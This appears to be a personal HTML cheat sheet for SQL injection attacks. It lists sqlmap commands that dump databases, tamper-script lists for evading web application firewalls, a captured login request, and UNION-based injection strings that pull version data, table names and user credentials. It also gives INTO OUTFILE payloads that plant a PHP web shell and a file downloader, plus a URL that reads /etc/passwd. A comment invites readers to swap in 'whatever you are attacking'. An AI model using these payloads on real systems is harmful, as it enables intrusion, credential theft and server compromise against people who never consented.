<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>SQL</title>
</head><body>###SQLMAP <br/>
<br/>
<br/>
sqlmap -r report.req --dbms=mysql --technique=U --dbms mysql --level 5 --risk 3 -p id --dump<br/>
<br/>
-r is the file name<br/>
--dbms is the database type<br/>
--technique is the type - U is union<br/>
-p is the parameter, in this case the parameter that is vulnerable is id<br/>
--level checks everything, user agents, cookies, all parameters<br/>
--risk will blow up how much traffic you generate and might get you caught<br/>
<br/>
<br/>
####SQLmap post parameter shit<br/>
<br/>
see the request below? &nbsp;add it to a text file and save whatever request you are attempting to exploit<br/>
<br/>
then<br/>
<br/>
select which parameter - in this parameter, the post requests you can check user, admin, and pass<br/>
<br/>
so, if you wanna check user parameter, do this<br/>
<br/>
sqlmap -r this-filename.txt -p user<br/>
<br/>
or if you wanna check the pass field, do this<br/>
<br/>
sqlmap -r this-filename.txt -p pass<br/>
<br/>
get it? got it? good<br/>
<br/>
<br/>
POST /?page=login HTTP/1.1<br/>
Host: 192.168.91.129<br/>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4<br/>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br/>
Accept-Language: en-US,en;q=0.5<br/>
Accept-Encoding: gzip, deflate<br/>
Referer: http://192.168.91.129/?page=login<br/>
Cookie: PHPSESSID=81uqq56dr9jb3o35qa2jdv0u61<br/>
Connection: close<br/>
Content-Type: application/x-www-form-urlencoded<br/>
Content-Length: 50<br/>
<br/>
user=admin&amp;pass=admin&amp;submit=Login<br/>
<br/>
<br/>
<br/>
**********<br/>
MySQL tampering<br/>
tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor<br/>
<br/>
MSSQL tampering<br/>
tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes<br/>
<br/>
General Tampering<br/>
tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes<br/>
<br/>
--------------------------<br/>
sqlmap -u 'http://1.sqli.labs/' -p user-agent --random-agent --banner<br/>
<br/>
sqlmap -r /root/Desktop/request.txt -p --user agent<br/>
<br/>
sqlmap -u http://5.sqli.labs -p user-agent --random-agent --banner --tamper=randomcase,space2comment,apostrophemask,informationschemacomment<br/>
<br/>
<br/>
-------------------<br/>
<br/>
<br/>
IP-address/cat.php?id=1 UNION SELECT 1,@@version,3,4--<br/>
<br/>
IP-address/cat.php?id=1 UNION SELECT 1,database(),3,4--<br/>
<br/>
IP-address/cat.php?id=1 UNION SELECT 1,current_user(),3,4--<br/>
<br/>
IP-address/cat.php?id=1 UNION SELECT 1,@@datadir,3,4--<br/>
<br/>
IP-address/cat.php?id=1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--<br/>
<br/>
IP-address/cat.php?id=1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="users"--<br/>
<br/>
IP-address/cat.php?id=1 UNION SELECT 1,group_concat(id,0x3a,login,0x3a,password),3,4 FROM photoblog.users--<br/>
<br/>
<br/>
<br/>
<br/>
' OR '1'='1<br/>
<br/>
<br/>
<br/>
<br/>
To write a PHP shell:<br/>
o &nbsp; &nbsp;SELECT '&lt;? system($_GET[\'c\']); ?&gt;' INTO OUTFILE '/var/www/shell.php';<br/>
&nbsp;<br/>
o &nbsp; &nbsp;and then access it at:<br/>
o &nbsp; &nbsp;http://localhost/shell.php?c=cat%20/etc/passwd<br/>
o &nbsp; &nbsp;To write a downloader:<br/>
o &nbsp; &nbsp;SELECT '&lt;? fwrite(fopen($_GET[f], \'w\'), file_get_contents($_GET[u])); ?&gt;' INTO OUTFILE '/var/www/get.php'<br/>
&nbsp;<br/>
o &nbsp; &nbsp;and then access it at:<br/>
o &nbsp; &nbsp;http://localhost/get.php?f=shell.php&amp;u=__URLSTART__http://localhost/c99.txt<br/>
<br/>
-----------------<br/>
<br/>
2nd Order SQL<br/>
<br/>
# Down below change the injection URL into what you need I.E. instead of selfie4you.com type in google #or whatever you are attacking.<br/>
#<br/>
# sqlmap -u 'http://127.0.0.1/2ndOrderPAYLOAD.php?payload=x' --technique=U \r\n<br/>
#<br/>
# Usage http://127.0.0.1/2ndOrderPAYLOAD.php?payload=' union select user(); -- -*****enter in malicious payload \r\n<br/>
#<br/>
#-------------------<br/>
&nbsp;<br/>
https://websec.ca/kb/sql_injection<br/>
<br/>
<br/>
-------------------------------------------------------<br/>
<br/>
/usr/share/sqlmap/tamper/__init__.py<br/>
/usr/share/sqlmap/tamper/apostrophemask.py<br/>
/usr/share/sqlmap/tamper/apostrophenullencode.py<br/>
/usr/share/sqlmap/tamper/appendnullbyte.py<br/>
/usr/share/sqlmap/tamper/base64encode.py<br/>
/usr/share/sqlmap/tamper/between.py<br/>
/usr/share/sqlmap/tamper/between.pyc<br/>
/usr/share/sqlmap/tamper/bluecoat.py<br/>
/usr/share/sqlmap/tamper/chardoubleencode.py<br/>
/usr/share/sqlmap/tamper/charencode.py<br/>
/usr/share/sqlmap/tamper/charencode.pyc<br/>
/usr/share/sqlmap/tamper/charunicodeencode.py<br/>
/usr/share/sqlmap/tamper/charunicodeencode.pyc<br/>
/usr/share/sqlmap/tamper/commalessmid.py<br/>
/usr/share/sqlmap/tamper/concat2concatws.py<br/>
/usr/share/sqlmap/tamper/equaltolike.py<br/>
/usr/share/sqlmap/tamper/equaltolike.pyc<br/>
/usr/share/sqlmap/tamper/greatest.py<br/>
/usr/share/sqlmap/tamper/greatest.pyc<br/>
/usr/share/sqlmap/tamper/halfversionedmorekeywords.py<br/>
/usr/share/sqlmap/tamper/ifnull2ifisnull.py<br/>
/usr/share/sqlmap/tamper/informationschemacomment.py<br/>
/usr/share/sqlmap/tamper/lowercase.py<br/>
/usr/share/sqlmap/tamper/modsecurityversioned.py<br/>
/usr/share/sqlmap/tamper/modsecurityzeroversioned.py<br/>
/usr/share/sqlmap/tamper/multiplespaces.py<br/>
/usr/share/sqlmap/tamper/multiplespaces.pyc<br/>
/usr/share/sqlmap/tamper/nonrecursivereplacement.py<br/>
/usr/share/sqlmap/tamper/nonrecursivereplacement.pyc<br/>
/usr/share/sqlmap/tamper/overlongutf8.py<br/>
/usr/share/sqlmap/tamper/percentage.py<br/>
/usr/share/sqlmap/tamper/randomcase.py<br/>
/usr/share/sqlmap/tamper/randomcase.pyc<br/>
/usr/share/sqlmap/tamper/randomcomments.py<br/>
/usr/share/sqlmap/tamper/securesphere.py<br/>
/usr/share/sqlmap/tamper/sp_password.py<br/>
/usr/share/sqlmap/tamper/space2comment.py<br/>
/usr/share/sqlmap/tamper/space2comment.pyc<br/>
/usr/share/sqlmap/tamper/space2dash.py<br/>
/usr/share/sqlmap/tamper/space2dash.pyc<br/>
/usr/share/sqlmap/tamper/space2hash.py<br/>
/usr/share/sqlmap/tamper/space2morehash.py<br/>
/usr/share/sqlmap/tamper/space2mssqlblank.py<br/>
/usr/share/sqlmap/tamper/space2mssqlhash.py<br/>
/usr/share/sqlmap/tamper/space2mysqlblank.py<br/>
/usr/share/sqlmap/tamper/space2mysqldash.py<br/>
/usr/share/sqlmap/tamper/space2mysqldash.pyc<br/>
/usr/share/sqlmap/tamper/space2plus.py<br/>
/usr/share/sqlmap/tamper/space2randomblank.py<br/>
/usr/share/sqlmap/tamper/symboliclogical.py<br/>
/usr/share/sqlmap/tamper/symboliclogical.pyc<br/>
/usr/share/sqlmap/tamper/unionalltounion.py<br/>
/usr/share/sqlmap/tamper/unmagicquotes.py<br/>
/usr/share/sqlmap/tamper/unmagicquotes.pyc<br/>
/usr/share/sqlmap/tamper/uppercase.py<br/>
/usr/share/sqlmap/tamper/uppercase.pyc<br/>
/usr/share/sqlmap/tamper/varnish.py<br/>
/usr/share/sqlmap/tamper/versionedkeywords.py<br/>
/usr/share/sqlmap/tamper/versionedmorekeywords.py<br/>
/usr/share/sqlmap/tamper/xforwardedfor.py<br/>
/usr/share/sqlmap/tamper/xforwardedfor.pyc<br/>
<br/>
</body></html>